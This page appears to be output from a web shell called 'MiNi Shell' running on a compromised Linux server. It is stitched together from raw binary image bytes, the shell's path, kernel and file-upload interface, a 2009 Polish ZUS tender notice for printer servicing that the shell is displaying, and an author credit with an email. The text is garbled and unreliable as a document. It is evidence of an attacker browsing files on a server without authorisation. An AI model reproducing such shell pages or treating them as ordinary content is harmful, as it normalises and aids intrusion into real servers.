JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090303/47576-N-2009.html

<p class="kh_header"><b>Warszawa: Usługi w zakresie  konserwacji i napraw drukarek</b><br>
<b>Numer ogłoszenia: 47576 - 2009; data zamieszczenia: 03.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych II Oddział w Warszawie , ul. Podskarbińska 25, 03-829 Warszawa, woj. mazowieckie, tel. 022 5902322, 5902321, faks 022 5902730, 5902600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ubezpieczenia społeczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie  konserwacji i napraw drukarek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest konserwacja i naprawa drukarek znajdujących się w II Oddziale ZUS w Warszawie oraz Inspektoratach: Otwock, Nowy Dwór Mazowiecki, Wołomin, Legionowo, Praga Północ+ROS przez okres 2 lat od daty podpisania umowy.
2.	Ilość drukarek objętych umową może ulec zmianie w przypadku:
2.1 wycofania sprzętu z eksploatacji
2.2 upływu gwarancji dostawcy na posiadany sprzęt
3.	W czasie trwania umowy Zamawiający dopuszcza możliwość zmiany miejsca lokalizacji sprzętu w ramach Oddziału i Inspektoratów bez zgody Wykonawcy.


I Konserwacja

1.	Konserwacja dokonywana będzie raz w roku w miesiącu maju:
1.1 według harmonogramu sporządzonego przez Oddział
1.2 potwierdzona protokołem przeglądu konserwacyjnego
1.3 konserwacja drukarek ujętych w Załączniku Nr 2 do umowy będzie przeprowadzona po upływie okresu gwarancyjnego

2.	Harmonogram prac z ramienia Zamawiającego określa Wydział Obsługi Informatycznej.
3.	Wykonawca zobowiązany jest do utrzymania urządzeń objętych konserwacją w ciągłej sprawności technicznej.

II Naprawy

1.	Zamawiający wymaga aby:
1.1 czas reakcji serwisowej od momentu zgłoszenia do przybycia serwisu na miejsce awarii nie przekroczył 1 doby
1.2 termin wykonania naprawy, licząc od zgłoszenia nie przekroczył 2 dni
1.3 Wykonawca posiadał odpowiednie zapasy części zamiennych do naprawy drukarek 
1.4 Wykonawca posiadał urządzenia rezerwowe na czas dokonywania napraw w przypadku konieczności naprawy poza siedzibą Zamawiającego, gdy przewidywany czas naprawy przekroczy 2 dni. W takim przypadku  Wykonawca dostarczy nieodpłatnie sprawny sprzęt zastępczy o parametrach technicznych odpowiadających urządzeniu pobranemu do naprawy.
2.	Zlecenie sprzętu do naprawy w imieniu Zamawiającego kwalifikuje Naczelnik Wydziału Obsługi Informatycznej lub osoba przez niego upoważniona. Drukarki ujęte w załączniku Nr 2 do umowy podlegają zgłoszeniu do naprawy po upływie okresu gwarancyjnego. Uszkodzony sprzęt będzie odbierany i przywożony do Oddziału lub Inspektoratów na koszt Wykonawcy. 
3.	Usługa naprawy będzie wykonywana na podstawie zgłoszenia naprawy skierowanego faxem do Wykonawcy 
3.1  zgłoszenie naprawy wysłane do Wykonawcy po godz. 1400 będzie traktowane jako zgłoszenie wysłane o godz. 7.30  następnego dnia
3.2  zgłoszenie naprawy, które wysłano do Wykonawcy po godz. 13.00 przed dniem wolnym od pracy traktowane będzie jako otrzymane o godz. 7.30 w pierwszy dzień roboczy następujący po dniu wolnym
4.	Każda naprawa zostanie potwierdzona protokołem naprawy potwierdzonym przez Wydział Obsługi Informatycznej  i Wykonawcę.
5.	Jeżeli naprawa nie może się odbyć z przyczyn technicznych w siedzibie ZUS, Wykonawca podstawi nieodpłatnie urządzenie o parametrach i właściwościach nie gorszych od naprawianego najpóźniej po 2 dobach od dnia zgłoszenia naprawy, a naprawy dokona w terminie do 30 dni.
6.	Sprzęt do naprawy może być wyniesiony z budynku Oddziału i Inspektoratów tylko na podstawie przepustki wystawionej przez Wydział Administracyjno-Gospodarczy oraz Inwestycji i Remontów lub równorzędne komórki organizacyjne w Inspektoratach.
7.	Użyte do naprawy części muszą być nowe i nie mogą być klasy niższej niż wymontowane, a data ich produkcji nie starsza niż urządzenie. W przypadku wycofania z rynku części zamiennych do przedmiotowych drukarek, Zamawiający dopuszcza użycie części regenerowanych, ale tylko po uprzednim uzgodnieniu z Zamawiającym.
8.	W przypadku stwierdzenia, że koszt naprawy przekroczy kwotę 500,00 zł netto, Wykonawca musi uzyskać zgodę Zamawiającego na naprawę. Wykonawca zobowiązany jest przedłożyć Zamawiającemu kalkulację kosztu naprawy. 
9.	Na żądanie Zamawiającego, Wykonawca dołączy fakturę-rachunek na zakup części zamiennych.
10.	Ryczałtowy czas naprawy dla poszczególnych typów drukarek określa Załącznik Nr 1c.
11.	W przypadku konieczności wykonania czynności nie ujętych w załączniku 1c, Zamawiający pokryje koszty w oparciu o przedstawioną uprzednio kalkulację kosztów uzgodnioną i zaakceptowaną przez Zamawiającego.
12.	Koszt roboczogodziny obejmuje wszystkie koszty Wykonawcy poza kosztem części zamiennych.
13.	 W przypadku braku celowości naprawy Wykonawca wystawi ocenę techniczną w postaci ekspertyzy serwisowej. Wymieniony przypadek będzie rozliczany wg stawki roboczogodziny przy naprawach serwisowych. Wydanie ekspertyzy równoznaczne jest z zapłatą za 1 roboczogodzinę (brak celowości - koszt naprawy przewyższa aktualną wartość urządzenia).
14.	Wykonawca udziela gwarancji:
 - na usługę naprawy sprzętu (robocizna) minimum 12 miesięcy
 - na użyte do naprawy części minimum 12 miesięcy lub gwarancji producenta lub importera..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.32.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> § 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  

2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

Doświadczenie zawodowe przedstawiające się wykonaniem lub  wykonywaniem  usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (okres świadczenia usługi min. 12 miesięcy), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. Zamawiający wymaga wykazania min. dwóch zamówień dot. wykonywania obsługi serwisowej drukarek o minimalnej liczbie 200 drukarek objętych serwisem naprawczym w skali 12 kolejnych miesięcy.

3.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia

4.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. 

§ 2. Ocena spełniania ww. warunków nastąpi na podstawie weryfikacji złożonych dokumentów na zasadzie spełnia lub nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> § 1. Wykonawcy biorący udział w postępowaniu muszą złożyć oświadczenie
potwierdzające spełnienie wymagań określonych w art. 22 ust. 1 pkt. 1- 4 ustawy Prawo  zamówień  publicznych

§ 2. Wykonawcy biorący udział w postępowaniu  muszą dostarczyć w celu potwierdzenia  spełnienia  warunków udziału w postępowaniu następujące dokumenty:

1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych Wykonawca musi złożyć:

a) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert

2.  W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnego doświadczenia Wykonawca musi złożyć:

wykaz usług wykonanych lub wykonywanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia (okres świadczenia usługi min. 12 miesięcy), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia tj. Zamawiający wymaga wykazania min. dwóch zamówień dot. wykonywania obsługi serwisowej drukarek o minimalnej liczbie 200 drukarek objętych serwisem naprawczym w skali 12 kolejnych miesięcy.

Ilość drukarek musi dotyczyć jednego kontraktu, przez co rozumie się, że musi wynikać  z jednostkowej  umowy  zawartej z jednym podmiotem.

Wykonawca musi przedstawić wykaz zawierający informacje o przedmiocie, datach wykonania i odbiorcach usługi. 
Do wykazu Wykonawca jest zobowiązany załączyć dokumenty potwierdzające , że wykazane usługi zostały wykonane należycie. Dokumenty muszą być wystawione przez zamawiającego-odbiorcę usług.

3. Wykonawca złoży oświadczenie o dysponowaniu drukarkami (min. 5% ogólnej ilości drukarek objętych serwisem) o parametrach  i właściwościach pozwalających spełniać minimalnie takie same funkcje jak sprzęt podlegający naprawie. Wykonawca musi dysponować sprzętem w związku z  wymaganiem dostarczania sprzętu na zastępstwo podczas naprawy 

§ 3. 1 Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w § 2 ust. 1 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

2. Dokument, o którym mowa w ust. 1,  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. l, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Zapis ust. 2 stosuje się odpowiednio.

§ 4.  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
W tym przypadku Wykonawcy występujący wspólnie (dot. również spółek cywilnych) muszą  złożyć:
-	pełnomocnictwo do reprezentacji podmiotów występujących wspólnie
-	każdy z uczestników wchodzący w skład podmiotu wspólnie ubiegającego się o udzielenie zamówienia musi załączyć dokumenty wymienione w § 1 i § 2 ust. 1 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w § 1 : w zakresie spełniania warunków określonych w art.22 ust. 1 pkt. 1 i 4 - składa każdy odrębnie, natomiast w zakresie określonym w art. 22 ust.1 pkt. 2 i 3 - wszyscy łącznie.

Wszystkie dokumenty Wykonawców mogących wspólnie ubiegać się o udzielenie zamówienia muszą wchodzić w skład danej oferty i być złożone łącznie.
Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zostanie wybrana, taki Wykonawca będzie zobowiązany przed zawarciem umowy w sprawie zamówienia publicznego do złożenia Zamawiającemu umowy regulującej współpracę tych wykonawców.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zus.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.zus.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2009 godzina 10:00, miejsce: Ofertę należy złożyć (przesłać)  w siedzibie Zamawiającego w Warszawie /kod pocztowy 03-829/  przy ul. Podskarbińskiej 25, pokój 321 /III piętro/.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com